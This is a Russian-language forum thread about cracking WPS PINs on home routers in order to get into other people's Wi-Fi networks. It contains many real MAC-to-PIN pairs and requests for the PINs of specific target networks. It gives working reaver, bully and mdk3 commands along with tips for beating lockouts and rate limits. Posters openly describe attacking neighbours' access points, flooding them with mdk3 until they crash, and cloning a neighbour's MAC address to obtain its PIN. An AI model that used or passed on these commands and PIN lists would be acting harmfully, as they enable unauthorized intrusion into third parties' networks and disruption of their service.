Обновил скрипт wpspin.py, добавил несколько простых алгоритмов. Может быть некоторые из них подойдут к каким-то роутерам.
binarymaster можно ли завести этот скрипт на виндовсе скачал питон но запустить не смог?
[/QUOTE]
binarymaster
16.03.2014, 22:30
binarymaster можно ли завести этот скрипт на виндовсе скачал питон но запустить не смог?
У меня на Windows работает.
https://www.python.org/download/releases/2.7.6/
У меня на Windows работает.
https://www.python.org/download/releases/2.7.6/
спасибо разобрался была версия python-3.3.5 снес ее и поставил версию 2,7,6 и все заработало
Vikhedgehog
16.03.2014, 23:52
Вот то что не успел отослать сегодня.
C8:60:00:92:2F:AA
63486858
C8:60:00:92:2F:FA
64953205
74:D0:2B:83:83:64
03316061
74:D0:2B:3B:19:C0
41111420
C8:60:00:91:C1:C2
89432839
08:60:6E:B9:D9:C0
83187650
60:A4:4C:55:BF:A4
33382647
60:A4:4C:D2:77:A8
14866135
D8:50:E6:42:D5:EC
06761424
D8:50:E6:42:D7:B4
04400066
D8:50:E6:AF:AC:58
30330504
D8:50:E6:42:9B:4C
20677541
D8:50:E6:F2:40:FC
88244402
D8:50:E6:93:EE:C0
34407721
AC:22:0B:EA:0E:30
02936543
D8:50:E6:42:91:D8
02221205
00:24:01:F7:B5:F2
62339704
D8:50:E6:AF:99:E4
40875101
1C:7E:E5:35:22:6C
52045363
C8:60:00:91:B2:5E
54615984
5C:D9:98:6B:D5:A0
80106760
84:C9:B2:49:4A:65
31342117
54:04:A6:8B:E6:DC
34597361
08:60:6E:F5:5A:AC
59959663
08:60:6E:CC:88:90
89453476
74:D0:2B:39:C0:04
05754304
D8:50:E6:42:CD:30
08821041
Eduardf2000
17.03.2014, 11:47
Пытался для "общего развития" и у своей встроенной в ноуте wi-fi карты пин посмотреть по выложенному здесь... но не нашел...
Realtek RTL8723AE Wireless LAN 802.11n PCI-E NIC
48-D2-24-D8-47-D3
Или у такой карты пина не бывает (только для роутеров) ???
fonsbonum
21.03.2014, 01:39
имея ПИН узнать пароль WiFi
Всем добрый вечер.Подскажите как мне узнать пароль WiFi .Пин я получил с помощью Wifislax.И даже подключился к точке с помощью TP-Link антенны введя только ПИН.Спасибо.
binarymaster
21.03.2014, 02:03
Всем добрый вечер.Подскажите как мне узнать пароль WiFi .Пин я получил с помощью Wifislax.И даже подключился к точке с помощью TP-Link антенны введя только ПИН.Спасибо.
Варианты:
1. reaver (Linux)
2. bully (Linux)
3. QSS/Jumpstart (Windows)
4. Посмотреть в админке роутера (Platform independent)
Всем добрый вечер.Подскажите как мне узнать пароль WiFi .Пин я получил с помощью Wifislax.И даже подключился к точке с помощью TP-Link антенны введя только ПИН.Спасибо.
1. reaver (Linux)
reaver -i mon0 -b 00:00:00:00:00:00 -vv -p 12345678
00:00:00:00:00:00 - mac точки
12345678 - пин
filya1988
21.03.2014, 06:32
Помогите пожалуйста! Очень нужен пин к Мак адресу 3C:818:1F:1E:ED
VladimirV
22.03.2014, 00:14
DSL-PIN
Сделал базу DSL PIN
ТЫЦ
PASS=мой ник
kulguninartu
26.03.2014, 23:20
Нужна помощь
Всем привет. Живу в Башкирии. Очень нужна ваша помощь. Нужен WPS с роутеров по MAC'у. Перебор по словарю = 0. Некоторые точки лоченые.
1) 68:15:90:4D:80:C5 - Rostelecom_80C4
2) 00:21:91:EF:3B:F8 - dlink
3) 18:62:2C:C0:91:CD - USDBashtel_91CC
4) D8:6C:E9:86:0B:70 - Sagemcom_2804
Аппарат - Alfa Awus036h.
Система - Kali Linux.
Крутая тема Кстати, походу у точек с началом 60:A4:4C встречается похожая закономерность что и у старых диапазонов не смотря на то, что этот мак адрес бывает и у новых точек, так что возможно у асусов не у каждой модели свой генератор wps, а у каждого мак диапазона, что может облегчить дальнейший поиск закономерностей Вот что смог насканить:
60:A4:4C:A2:C6:94 02863245
60:A4:4C:26:25:ED 24147460
60:A4:4C:A6:49:A8 52421303
60:A4:4C:83:A1:1C 43053100
60:A4:4C:DE:25:78 64651439
60:A4:4C:86:54:7C 40403007
60:A4:4C:A3:A8:48 06432034
60:A4:4C:79:47:F8 24234047
60:A4:4C:3A:B6:A0 40122502
60:A4:4C:A3:85:D4 06072438
60:A4:4C:A4:86:9C 00120029
60:A4:4C:C6:93:84 42329343
Не подскажите, не нашли ли закономерность у этих точек?
Пытаюсь сломать точку, reaver не хочет проходить ассоциацию, пробую вручную через aireplay, выдает:
10:14:03 Waiting for beacon frame (BSSID: ) on channel 9
10:14:03 Sending Authentication Request (Open System)
10:14:05 Sending Authentication Request (Open System)
10:14:05 Authentication successful
10:14:05 Sending Association Request [ACK]
10:14:05 Association denied (code 27)
10:14:08 Sending Authentication Request (Open System) [ACK]
10:14:10 Sending Authentication Request (Open System) [ACK]
10:14:10 Authentication successful
10:14:10 Sending Association Request [ACK]
10:14:10 Association denied (code 27)
10:14:13 Sending Authentication Request (Open System)
10:14:15 Sending Authentication Request (Open System)
10:14:15 Authentication successful
10:14:15 Sending Association Request [ACK]
10:14:15 Association denied (code 27)
Я так понимаю у точки фильтрация по MAC'ам или в чем может быть дело? Сигнал хороший.
А не подскажете стандартные параметры reaver для TP-Link'овских роутеров? Ну там таймауты всякие, ато меня банят все соседские точки, я почти уверен что везде у них настройки стандартные.
>Warning:detected AP rate limiting, waiting 60 seconds before ...
И так оно на непонятно какой срок отрубается. Я не могу подобрать таймауты.
А не подскажете стандартные параметры reaver для TP-Link'овских роутеров? Ну там таймауты всякие, ато меня банят все соседские точки, я почти уверен что везде у них настройки стандартные.
>Warning:detected AP rate limiting, waiting 60 seconds before ...
И так оно на непонятно какой срок отрубается. Я не могу подобрать таймауты.
Сколько я сталкивался с TP-Linkом - помогал таймаут на 24 часа или MDK3
eD"]
Пытаюсь сломать точку, reaver не хочет проходить ассоциацию, пробую вручную через aireplay, выдает:
10:14:03 Waiting for beacon frame (BSSID: ) on channel 9
10:14:03 Sending Authentication Request (Open System)
10:14:05 Sending Authentication Request (Open System)
10:14:05 Authentication successful
10:14:05 Sending Association Request [ACK]
10:14:05 Association denied (code 27)
10:14:08 Sending Authentication Request (Open System) [ACK]
10:14:10 Sending Authentication Request (Open System) [ACK]
10:14:10 Authentication successful
10:14:10 Sending Association Request [ACK]
10:14:10 Association denied (code 27)
10:14:13 Sending Authentication Request (Open System)
10:14:15 Sending Authentication Request (Open System)
10:14:15 Authentication successful
10:14:15 Sending Association Request [ACK]
10:14:15 Association denied (code 27)
Я так понимаю у точки фильтрация по MAC'ам или в чем может быть дело? Сигнал хороший.
Это ты помой-му делаешь фейковую авторизацию (aireplay-ng), а во втором окне должен REAVERом перебирать пины
Сколько я сталкивался с TP-Linkом - помогал таймаут на 24 часа или MDK3
А вот за MDK3 благодарю, кажется положил все тп-линки в округе, правда асус держится, но до него далековато. Другое дело что эти тп-линки не загружаются теперь, при его работе airodump виснет и не ясно на скольки клиентах они вырубаются, вроде 20к уже достаточно
А вот за MDK3 благодарю, кажется положил все тп-линки в округе, правда асус держится, но до него далековато. Другое дело что эти тп-линки не загружаются теперь, при его работе airodump виснет и не ясно на скольки клиентах они вырубаются, вроде 20к уже достаточно
Каждая точка по разному, у меня сейчас TP-Link 740N 64:66:b3:xx:xx:xx так бывает и 8000 хватает, а бывает что надо более 200 000.
VladimirV
30.03.2014, 02:00
А по таким есть данные:
Pass - подошел.
Сотру через сутки!!!
Vikhedgehog
30.03.2014, 02:36
А по таким есть данные:
---
Pass - подошел.
Сотру через сутки!!!
У них что, у всех одинаковый пароль?
VladimirV
30.03.2014, 02:42
У них что, у всех одинаковый пароль?
Скорей всего разный!!!
ESSID тоже совпал.
Эт я ломал месяц а потом спросил есть-ли доступ к роутеру и мне ответили - есть!!! И позволили зайти и сфоткать.
Про PIN я в админке вроде ничего не увидел. (или плохо смотрел)
Скорей всего разный!!!
ESSID тоже совпал.
Эт я ломал месяц а потом спросил есть-ли доступ к роутеру и мне ответили - есть!!! И позволили зайти и сфоткать.
Про PIN я в админке вроде ничего не увидел. (или плохо смотрел)
Странно.... Но пин же должен быть!!!!
Goodfella
30.03.2014, 19:52
Буду там поищу пин еще!!!
Ищи вкладку WPS, его может не быть если WPS не активен.
VladimirV
30.03.2014, 23:58
Буду там поищу пин еще!!!
Нет та WPS и .
Скрины вытащу с телефона убедитесь!!!
Хотя кнопка на девайсе есть - только толку от нее мало. При нажатии на кнопку ниче не происходит!!!
Скрины переехали сюда:ТЫЦ
Как всегда телефон выручает!!!!
Это не все скрины - но PIN нет нигде!!!
инет от нее довольно чахлый - но если нет другого, сойдет!!!
Vikhedgehog
31.03.2014, 00:38
А ривер пин коды перебирает или не идет?
VladimirV
31.03.2014, 00:40
А ривер пин коды перебирает или не идет?
им непробовал, будет время попробую...
Vikhedgehog
31.03.2014, 23:03
Кто-нибудь находил закономерность у Beeline D150L?
MAC: 1C:7E:E5:8F:D6:F0
PIN: 0731139
DEC: 9426672
MAC: 1C:7E:E5:DE:7A:DC
PIN: 3339769
DEC: 4580444
MAC: 1C:7E:E5:90:21:F2
PIN: 6148165
DEC: 9445874
К сожалению там не у многих стоит стандартный пароль на веб-морде.
как подключиться к wifi сети по пин коду wps в android 4.2.2? может кто знает? очень надо
Goodfella
02.04.2014, 21:03
Это не все скрины
Скрины остальных вкладок в студию
В статусе, понятное дело, ничего нет...
VladimirV
06.04.2014, 18:02
Скрины остальных вкладок в студию
В статусе, понятное дело, ничего нет...
Скринов много потому выкладываю в архиве!!!
Там есть скриншот поиска сети, и подключение по WPS нет!!!
ТЫЦ
Goodfella
07.04.2014, 09:52
Там есть скриншот поиска сети, и подключение по WPS нет!!!
Порылся в мануале, действительно нет. Даже пина на корпусе устройства. Хотя в HG532E3 он есть..
http://radikall.com/images/2014/04/07/qEeVB.jpg
Как продолжить перебор с определённого pin?
VladimirV
07.04.2014, 22:38
Как продолжить перебор с определённого pin?
Вот так - reaver -i mon0 -b BSSID -vv -p1080194 - Это подбор по одному пину (Без 8-го знака, подставится автоматом).
reaver -i mon0 -b BSSID -vv -p1080 - Это подбор по первой части пина.
Канал не указан, сначала происходит поиск по каналам данного BSSID, и если нашло то подбор пин.
Если в конце команды дописать -с6 то поиск BSSID будет производиться только на 6 канале.
Прример: reaver -i mon0 -b BSSID -vv -p10801949 - с6
Вот так - reaver -i mon0 -b BSSID -vv -p1080194 - Это подбор по одному пину (Без 8-го знака, подставится автоматом).
reaver -i mon0 -b BSSID -vv -p1080 - Это подбор по первой части пина.
Канал не указан, сначала происходит поиск по каналам данного BSSID, и если нашло то подбор пин.
Если в конце команды дописать -с6 то поиск BSSID будет производиться только на 6 канале.
Прример: reaver -i mon0 -b BSSID -vv -p10801949 - с6
Вообще-то, чтоб продолжить с определенного пина его надо прописать в файле хххххххххххх.wpc - (первая строчка), где хххххххххххх имя файла по маку точки. Где то здесь в форуме это уже подробно расписывалось.
VladimirV
10.04.2014, 00:50
Вообще-то, чтоб продолжить с определенного пина его надо прописать в файле хххххххххххх.wpc - (первая строчка), где хххххххххххх имя файла по маку точки. Где то здесь в форуме это уже подробно расписывалось.
Я вроде все ясно расписал (указав что будет беребираться) для 'toro' (перед этим просмотрев его посты), если ему не помогло или не подощло пусть напишет.
reaver при работе стабильно вываливается с ошибкой. Приходится перезапускать вручную. в итоге вместо 20 часов уходит более 40.
Команда вида: "reaver -i mon0 -vv -b *************"
Ошибка:
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 63775679
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
Segmentation fault
Как побороть?
PS: использую kali linux 1.0.6 x86
reaver при работе стабильно вываливается с ошибкой. Приходится перезапускать вручную. в итоге вместо 20 часов уходит более 40.
Команда вида: "reaver -i mon0 -vv -b *************"
Ошибка:
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 63775679
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
Segmentation fault
Как побороть?
PS: использую kali linux 1.0.6 x86
Попробуй BULLY вместо REAVER, команда:
bully mon0 -b XX:XX:XX:XX:XX:XX -c # -S -w /root/
Вчера вскрыл точку TP-Link TL-WR740N с Маком 64:66:B3:......
Пять месяцев перебора пинов REAVERом, не напрягаясь
Пароль: B6831AB6ECB27E2216B21D0A9378D44F0FEA4FD4EBAD28B656 845EE1CD3E5198
Пин: 7228хххх вторая часть пина вначале
Router Scan ничего не находит, такой пароль ломать бесмысленно
To comporg
Пароль в 64 символа заглавными - признак того, что точка после "глюка" или после того, как к ней подключались по пину, а она от этого "заглючила". Еще это признак того, что хозяин не пользуется wi-fi и в интерфейс роутера давно не заглядывал, а еще так может выглядеть ненастроенное wep шифрование.
Я тоже недавно достучался до одной 64:66:B3 Она лочилась после 10-ти попыток, но хорошо откликалась на mdk3, сбрасывая лок доступа к пину и позволяя продолжать. Пароль там явно был поставлен опытным человеком, хотя за две недели я не увидел ни одного клиента на точке.
To comporg
Пароль в 64 символа заглавными - признак того, что точка после "глюка" или после того, как к ней подключались по пину, а она от этого "заглючила". Еще это признак того, что хозяин не пользуется wi-fi и в интерфейс роутера давно не заглядывал, а еще так может выглядеть ненастроенное wep шифрование.
Я тоже недавно достучался до одной 64:66:B3 Она лочилась после 10-ти попыток, но хорошо откликалась на mdk3, сбрасывая лок доступа к пину и позволяя продолжать. Пароль там явно был поставлен опытным человеком, хотя за две недели я не увидел ни одного клиента на точке.
Клиенты почти постоянно есть, понаблюдаю....
Уверен, что разберешься.
Для начала проверить тип шифрования: что там, wep или wpa/wpa2.
Если wep, то атакой на wep посмотреть в каком виде покажет пароль.
Если wpa/wpa2 и есть клиенты, то поймать хендшейк и попробовать перебор внеся в словарь этот длинный пароль. Еще может быть ривер не понимает ответа от точки. Можно попробовать, зная пин, спросить точку с помощью булли.
To comporg
Пароль в 64 символа заглавными - признак того, что точка после "глюка" или после того, как к ней подключались по пину, а она от этого "заглючила". Еще это признак того, что хозяин не пользуется wi-fi и в интерфейс роутера давно не заглядывал, а еще так может выглядеть ненастроенное wep шифрование.
Я тоже недавно достучался до одной 64:66:B3 Она лочилась после 10-ти попыток, но хорошо откликалась на mdk3, сбрасывая лок доступа к пину и позволяя продолжать. Пароль там явно был поставлен опытным человеком, хотя за две недели я не увидел ни одного клиента на точке.
Можно поподробней про отклик на mdk3. Какую команду вводить что бы продолжить?
Можно поподробней про отклик на mdk3. Какую команду вводить что бы продолжить?
mdk3 --help
mdk3 --help
Спасибо что всё подробно разжевал .
Можно поподробней про отклик на mdk3. Какую команду вводить что бы продолжить?
На какие устройства и как действует mdk3 до сих пор четко не ясно. Из моего опыта лишь две модели tp-link, которые лочились после 10-ти попыток подбора пина, откликнулись на команду:
mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -m
Эту команду надо запускать на 8-12 секунд (время подбирать самому), а потом прерывать. За это время команда "вешает" примерно 5000-6000 клиентов на точку, от чего tp-link перегружается. Какая именно происходит перезагрузка мне выяснить не удалось. На полную перезагрузку устройства не похоже, т.к. точка появляется снова в эфире примерно через 8-12 секунд (полная перезагрузка длится от 40 секунд и более), но после нее стираются все логи в устройстве, точка часто меняет канал (иногда не меняет) и снова появляется возможность попробовать 10 пинов. Возможно происходит лишь сброс настроек wi-fi модуля и стирается журнал логов.
В этой теме форумчанин klaatu предлагал хороший скрипт для автоматизации такого процесса. Еще раз повторю, что у меня положительный результат лишь с двумя tp-link. Я пока не встречал устройств от других производителей, которые пусть не так, пусть по-другому, но реагировали на работу mdk3.
Вчера вскрыл точку TP-Link TL-WR740N с Маком 64:66:B3:......
Пять месяцев перебора пинов REAVERом, не напрягаясь
Эти точки (TL-WR740N) судя по всему очень глючные. Работал такую несколько месяцев. Лочилась. Потом снял хендшейк. Здесь помогли с паролем. По паролю подключился, зашел на точку по дефолтному паролю, посмотрел пин. Потом по известному пину в ривере получил пароль такого же длинного вида. Хотя через Винду по короткому подключается нормально. Через время не могу подключиться. Сменили пароль. В ривере по известному пину получаю новый пароль уже нормального вида. По нему подключаюсь без проблемм.
Vikhedgehog
12.04.2014, 18:02
Эти точки (TL-WR740N) судя по всему очень глючные. Работал такую несколько месяцев. Лочилась. Потом снял хендшейк. Здесь помогли с паролем. По паролю подключился, зашел на точку по дефолтному паролю, посмотрел пин. Потом по известному пину в ривере получил пароль такого же длинного вида. Хотя через Винду по короткому подключается нормально. Через время не могу подключиться. Сменили пароль. В ривере по известному пину получаю новый пароль уже нормального вида. По нему подключаюсь без проблемм.
У TP-LINK точек WPS по умолчанию находится в ненастроенном состоянии, т. е. пока точку не настроят через WPS (а не через web интерфейс) она будет выдавать такую глюченую информацию.
одолел я всётаки этот гадкий мак адрес , но возникла другая проблема или вопрос
[+] WPS PIN: '60557933'
[+] WPA PSK: '6BEE841FDFB01EBC3D5B2CBAEB4DC8CAFB60D47748D46FF25 5FA349AE5A6354E'
[+] AP SSID: 'Network-DFB01EBC3D5B2CBAEB4DC8CA '
[+] AP MAC : 64:70:02:B3:71:84
тут какбы должны быть буквы и цыфры , а тут код какойто
чем перевести в нормальный вид , потаму конекта нету
какой может быть pin (или пароль) у точки
ESSID:MGTS_GPON_9083 (оптоволокно от мгтс)
BSSID:00:0E:8F:667:5C
роутер там вроде Sercomm GPON RV6688
http://www.mgts.ru/upload/images/f/1/home/internet/equipment/modems/instruction_Sercom.pdf
какой может быть pin (или пароль) у точки
ESSID:MGTS_GPON_9083 (оптоволокно от мгтс)
BSSID:00:0E:8F:667:5C
роутер там вроде Sercomm GPON RV6688
http://www.mgts.ru/upload/images/f/1/home/internet/equipment/modems/instruction_Sercom.pdf
По инфе отсюда пароль от wi-fi это номер телефона.
По инфе отсюда пароль от wi-fi это номер телефона.
нет,не номер телефона
Diamon Jess
01.05.2014, 15:28
одолел я всётаки этот гадкий мак адрес , но возникла другая проблема или вопрос
[+] WPS PIN: '60557933'
[+] WPA PSK: '6BEE841FDFB01EBC3D5B2CBAEB4DC8CAFB60D47748D46FF25 5FA349AE5A6354E'
[+] AP SSID: 'Network-DFB01EBC3D5B2CBAEB4DC8CA '
[+] AP MAC : 64:70:02:B3:71:84
тут какбы должны быть буквы и цыфры , а тут код какойто
чем перевести в нормальный вид , потаму конекта нету
7-bit ASCII → ISO-8859-5 Возможно подойдет так -
ЖТХХИДБЦФЦТАБХТУГФЕТВУТСХ ТДФУИУСЦТЖАФДЗЗДИФДЖЦЦВЕ ЕЦСГДЙСХЕСЖГЕДХ
что то заметил,уже все точки лочаться......у всех или новые точки или прошивки.....что то старое взламывать можно,что то wps актуальность теряет....
7-bit ASCII → ISO-8859-5 Возможно подойдет так -
ЖТХХИДБЦФЦТАБХТУГФЕТВУТСХ ТДФУИУСЦТЖАФДЗЗДИФДЖЦЦВЕ ЕЦСГДЙСХЕСЖГЕДХ
Все же в этом варианте нужно пробовать QSS
Все же в этом варианте нужно пробовать QSS
100%,пасс потом в винде в свойствах адаптера видно,правильный
Vikhedgehog
05.05.2014, 01:36
Заметил, что если DIR-400 перепрошить в dd-wrt, а потом обратно, то MAC адрес полностью сотрется и точка станет определять его как 00:01:23:45:67:89
Мне удалось влезть в одну из таких точек и выяснилось, что WPS пин = 56759518, скорее всего у точек с подобным адресом тот же пин.
Видно, что первые 3 числа имеют прямую зависимость от мак адреса.
Кстати, было бы круто научиться по настоящему менять мак адрес. То есть не просто подделывать, а менять так, чтоб точка его помнила даже после резета/перепрошивки. Тогда нужно будет просто узнать модель роутера соседа, потом купить такой же роутер и поставить тот же мак, что и у соседа, тогда в настройках будет тот же пин что у него. На практике постоянная смена мак адреса возможна, например при перепрошивке DIR-320 мак адрес меняется на 00:90:4C:C1:00:00 навсегда. Конечно делать такое на D-Linkах не очень интересно, потому что они и так прекрасно взламываются ривером без всяких задержек, а вот на асусах или даже на tp-linkах было бы очень интересно такое замутить.
binarymaster
05.05.2014, 13:37
при перепрошивке DIR-320 мак адрес меняется на 00:90:4C:C1:00:00 навсегда
Не навсегда. Можно сменить так:
nvram set et0macaddr=
nvram set wl0_hwaddr=
nvram set wan_hwaddr=
nvram commit
ritalinov
07.05.2014, 18:04
Tenda mac c8:3a:35:1d:ad:38 среагировал на метод перевода из 16-ричной hex в 10-тичную dec и выдал число 1944888, в итоге пин 19448886
saimonyz
09.05.2014, 21:30
BSSID WPS Pin Server name / Realm name / Device type
00:1B:11:36:63:C4 11113560 D-Link DIR-320, hardware: rev 2B1, firmware: 1.00
00:21:91:0D:61:1B 26696577 D-Link DIR-615, hardware: B2, firmware: 2.27
00:1B:11:37:D1:04 21544422 D-Link DIR-320, hardware: rev 2B1, firmware: 1.21
D8:5D:4C:A0:79:14 42208488 TP-LINK TL-WR740N
00:1C:F0:66:08:08 67399963 D-Link DIR-635, hardware: B1, firmware: 2.33
10:FE:ED:D3:C7:F6 50203864 TP-LINK TL-WR740N
64:66:B3:12:60:9A 3917671 TP-LINK TL-WR741ND
00:1B:11:36:19:39 47649873 D-Link DIR-320, hardware: rev 2B1, firmware: 1.00
00:18:E7:FA:7A:0D 13383473 HNAP Info: D-Link DIR-615, firmware: 5.11RU
00:1B:11:36:1A:86 10618189 D-Link DIR-320, hardware: rev 2B1, firmware: 1.00
1C:AF:F7:1B:54:E4 52156045 D-Link DIR-300, hardware: B1, firmware: 2.02
00:25:9C:5C:6C:60 70574210 ASUS RT-N10
BC:AE:C5:88:72:56 98035762 D-Link DIR-300, hardware: B1, firmware: 2.01
00:26:5A:9A:E3:A6 2023076 ASUS RT-N10P Black
D8:50:E6:B1:A7:A0 85482135 D-Link DIR-300, hardware: B1, firmware: 2.01
1C:AF:F7:28:5A:CE 61041660 D-Link DIR-300, hardware: B1, firmware: 2.01
00:26:5A:9C:29:30 35784708 D-Link DIR-655, hardware: A4, firmware: 1.36
00:26:5A:FC:FC:D2 56154795 TP-LINK TL-WR743ND
90:F6:52:2F:E1:8A 70841268 TP-LINK TL-WR740N
Vikhedgehog
10.05.2014, 03:34
Здраствуйте,
Скажите, будут ли новые точки ASUS (RT-N66U и тп.) уходить в лок если первая часть PIN кода указана верно и выполняется поиск второй части? Спасибо.
BSSID WPS Pin Server name / Realm name / Device type
00:1B:11:36:63:C4 11113560 D-Link DIR-320, hardware: rev 2B1, firmware: 1.00
00:21:91:0D:61:1B 26696577 D-Link DIR-615, hardware: B2, firmware: 2.27
00:1B:11:37:D1:04 21544422 D-Link DIR-320, hardware: rev 2B1, firmware: 1.21
D8:5D:4C:A0:79:14 42208488 TP-LINK TL-WR740N
00:1C:F0:66:08:08 67399963 D-Link DIR-635, hardware: B1, firmware: 2.33
10:FE:ED:D3:C7:F6 50203864 TP-LINK TL-WR740N
64:66:B3:12:60:9A 3917671 TP-LINK TL-WR741ND
00:1B:11:36:19:39 47649873 D-Link DIR-320, hardware: rev 2B1, firmware: 1.00
00:18:E7:FA:7A:0D 13383473 HNAP Info: D-Link DIR-615, firmware: 5.11RU
00:1B:11:36:1A:86 10618189 D-Link DIR-320, hardware: rev 2B1, firmware: 1.00
1C:AF:F7:1B:54:E4 52156045 D-Link DIR-300, hardware: B1, firmware: 2.02
00:25:9C:5C:6C:60 70574210 ASUS RT-N10
BC:AE:C5:88:72:56 98035762 D-Link DIR-300, hardware: B1, firmware: 2.01
00:26:5A:9A:E3:A6 2023076 ASUS RT-N10P Black
D8:50:E6:B1:A7:A0 85482135 D-Link DIR-300, hardware: B1, firmware: 2.01
1C:AF:F7:28:5A:CE 61041660 D-Link DIR-300, hardware: B1, firmware: 2.01
00:26:5A:9C:29:30 35784708 D-Link DIR-655, hardware: A4, firmware: 1.36
00:26:5A:FC:FC:D2 56154795 TP-LINK TL-WR743ND
90:F6:52:2F:E1:8A 70841268 TP-LINK TL-WR740N
а что за скрипт?
saimonyz
10.05.2014, 14:28
utyara
http://stascorp.com/load/1-1-0-56
Vikhedgehog
будет
DLINK
подскажите pin по мак адресу :
1C:AF:F7:96:CD:3F (я уже все выше перечисленные пробывал - не подходят)
binarymaster
14.05.2014, 02:32
подскажите pin по мак адресу :
1C:AF:F7:96:CD:3F (я уже все выше перечисленные пробывал - не подходят)
Это ж D-Link, там с pin-ами не всё так очевидно.
Вот такие пробовал?
98829439
06399351
Это ж D-Link, там с pin-ами не всё так очевидно.
Вот такие пробовал?
98829439
06399351
Вобщем,не подходит,так и просится на "полный" перебор
!!!
Не знаю,куда писать,но интересует вопрос по DWL-2100AP
Т.е. какую прошивку и как залить в него,чтобы он не раздавал интернет,а наоборот - подключался к точкам???
и также,можно было б вардрайвенгом заниматься.
Vikhedgehog
14.05.2014, 19:17
Не знаю,куда писать,но интересует вопрос по DWL-2100AP
Т.е. какую прошивку и как залить в него,чтобы он не раздавал интернет,а наоборот - подключался к точкам???
и также,можно было б вардрайвенгом заниматься.
OpenWrt.
Всем привет.
Парни, помогите ПИНом.
A0:F3:C1:8B:68:2C
Пробовал из 16 в 10.Не подходит..
OpenWrt.
Ну смотри,скачал файл - openwrt-atheros-vmlinux (1.3мб)
Нашел вроде как программатор - APM_by_ACOWA (если можно так выразится),там блин не робит вкладка FTP Programmer.... как вот вот быть? Или винду XP искать,и через нее прошить? оишбка на 7ке вылазит "COMDLG32.OCX"
binarymaster
14.05.2014, 23:44
Ну смотри,скачал файл - openwrt-atheros-vmlinux (1.3мб)
Нашел вроде как программатор - APM_by_ACOWA (если можно так выразится),там блин не робит вкладка FTP Programmer.... как вот вот быть? Или винду XP искать,и через нее прошить? оишбка на 7ке вылазит "COMDLG32.OCX"
Мне кажется, или лучшие программаторы у роутеров - это их встроенные? Те, которые принимают прошивку через tftp.
Всем привет.
Парни, помогите ПИНом.
A0:F3:C1:8B:68:2C
Пробовал из 16 в 10.Не подходит..
та с чего вдруг он подходить должен это ж не кенетик,вот чего то многие думают.что этот метод ко всем точкам применим так бы всё быстро и ломалось бы
Мне кажется, или лучшие программаторы у роутеров - это их встроенные? Те, которые принимают прошивку через tftp.
Да,встроенные "проглатывает" прошивки без проблем (через http),только я не нашел open wrt с расширением tfp для моего роутера - D-Link DWL-2100AP.
Кто сможет помочь? оживить,и впустить его в дело,лишь бы конектился к wi fi точкам. (выкидывать жалко)
Vikhedgehog
20.05.2014, 20:41
Добрый день
Скажите, а новые кинетики с самой актуальной прошивкой до сих пор имеют дыру в WPS или ее уже прикрыли? Заранее спасибо за ответы.
Добрый день
Скажите, а новые кинетики с самой актуальной прошивкой до сих пор имеют дыру в WPS или ее уже прикрыли? Заранее спасибо за ответы.
попалось 5 штук таких ТД и все с рабочим алгоритмом pin=hex to 10.
binarymaster
21.05.2014, 01:06
Добрый день
Скажите, а новые кинетики с самой актуальной прошивкой до сих пор имеют дыру в WPS или ее уже прикрыли? Заранее спасибо за ответы.
Как сообщил выше user100, да, это так.
WPS включён по умолчанию и принимает пины по известному алгоритму. Причём, в NDMS v2 выключить WPS штатными средствами веб интерфейса невозможно. Только через CLI.
Хотя, учитывая мои исследования этой прошивки, можно на практике сформировать такой HTTP запрос, который:
1. Получает состояние WPS (вкл/выкл)
2. Получает текущий пин код (используется в Router Scan)
Т.е. теоретически можно сформировать такой запрос, который бы управлял функциями WPS. Забавно, что в Web-интерфейсе этих функций не реализовано, хотя там используется самый обычный jQuery.
Vikhedgehog
21.05.2014, 01:18
Нашел пару соотношений мак адрес - wps pin для точек SAGEMCOM. Может получится найти алгоритм
Micro DSL (F@ST1704N | 7.240a4N RTC) = 18:62:2C:D5:A2:99 = 08111531
Micro DSL (F@ST1704N | 7.240a4N RTC) = 34:8A:AE:1A:59:ED = 61469969
Micro DSL (F@ST1704N | 7.240a4N RTC) = 34:8A:AE:1A:12:A4 = 06710255
Micro DSL (F@ST1704N | 7.240a4N RTC) = 34:8A:AE:1A:86:F5 = 18173055
Micro DSL (F@ST1704N | 7.240a4N RTC) = 34:8A:AE:1A:5C:FA = 56565355
Micro DSL (F@ST1704N | 7.240a4N RTC) = 34:8A:AE:15:41:7B = 61894891
Как сообщил выше user100, да, это так.
WPS включён по умолчанию и принимает пины по известному алгоритму. Причём, в NDMS v2 выключить WPS штатными средствами веб интерфейса невозможно. Только через CLI.
Хотя, учитывая мои исследования этой прошивки, можно на практике сформировать такой HTTP запрос, который:
1. Получает состояние WPS (вкл/выкл)
2. Получает текущий пин код (используется в Router Scan)
Т.е. теоретически можно сформировать такой запрос, который бы управлял функциями WPS. Забавно, что в Web-интерфейсе этих функций не реализовано, хотя там используется самый обычный jQuery.
Это радует (с хакерской точки зрения)
VladimirV
21.05.2014, 13:44
Написал небольшую программку для поиска пинов и определения модели роутера.
http://i64.fastpic.ru/big/2014/0521/c2/aaf79e8c4f26bd4b5d1fbab67cb7a0c2.jpg
Работает просто. сканируем WPS командой Wash, выделяем мышкой строки и копируем в буфер обмена. Далее кликаем в программе по полю с вкладками 'BSSID Ch RSI ESSID' (активируем его) затем правый клик и выбираем 'Insert'. Должны вставиться скопированные данные. Далее:
одинарный клик по BSSID - генерирует команду reaver (из BSSID по которому кликали!!!)
двойной клик по BSSID - запускает поиск по BSSID (ищется сначала полный BSSID потом без последнего символа и т.д.) Если есть совпадения во втором поле выделится строка.
Ctrl+Del - Удалить Строку
Ins - Вставить пустую строку
Ctrl+x,Ctrl+c,Ctrl+v - вырезать, скопировать, вставить.
II - поле.
одинарный клик по BSSID - генерирует команду reaver (из BSSID по которому кликали!!!)
одинарный клик по PIN - генерирует команду reaver с этим пином
одинарный клик по BSSID-PIN - Выбирает что отнимать, прибавлять, или PIN постоянный (Необходимо снова кликнуть по BSSID)
Ctrl+Del - Удалить Строку
Ins - Вставить пустую строку
Ctrl+x,Ctrl+c,Ctrl+v - вырезать, скопировать, вставить.
Все изменения сохраняйте сами - программа при выходе не спрашивает!!!
У меня на Windows и back track 5 работает.
